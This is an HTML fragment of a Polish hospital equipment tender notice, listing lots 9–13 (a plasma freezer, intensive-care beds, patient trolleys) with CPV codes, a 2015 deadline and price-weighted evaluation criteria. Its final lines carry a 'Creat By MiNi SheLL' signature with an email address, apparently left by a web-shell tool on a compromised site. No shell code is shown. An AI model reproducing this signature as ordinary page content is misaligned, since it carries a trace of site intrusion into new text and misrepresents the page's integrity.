<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zamrażarka do zamrażania osocza dla potrzeb Pracowni Serologii Transfuzjologicznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamrażarka do zamrażania osocza dla potrzeb Pracowni Serologii Transfuzjologicznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.11.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Łóżka intensywnego nadzoru z osprzętem szt.7 dla potrzeb Oddziałów Szpitalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Łóżka intensywnego nadzoru z osprzętem szt.7 dla potrzeb Oddziałów Szpitalnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.21.20-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Łóżka intensywnego nadzoru z osprzętem szt.3 z udźwigiem min.250 kg, dla potrzeb Oddziałów Szpitalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Łóżka intensywnego nadzoru z osprzętem szt.3 z udźwigiem min.250 kg, dla potrzeb Oddziałów Szpitalnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.21.20-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. parametry techniczne - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Wózek do przewożenia chorych w pozycji leżącej szt.4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wózek do przewożenia chorych w pozycji leżącej szt.4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. parametry techniczne - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Łóżka intensywnego nadzoru z osprzętem szt.23 dla potrzeb Oddziałów Szpitalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Łóżka intensywnego nadzoru z osprzętem szt.23 dla potrzeb Oddziałów Szpitalnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.21.20-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin gwarancji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com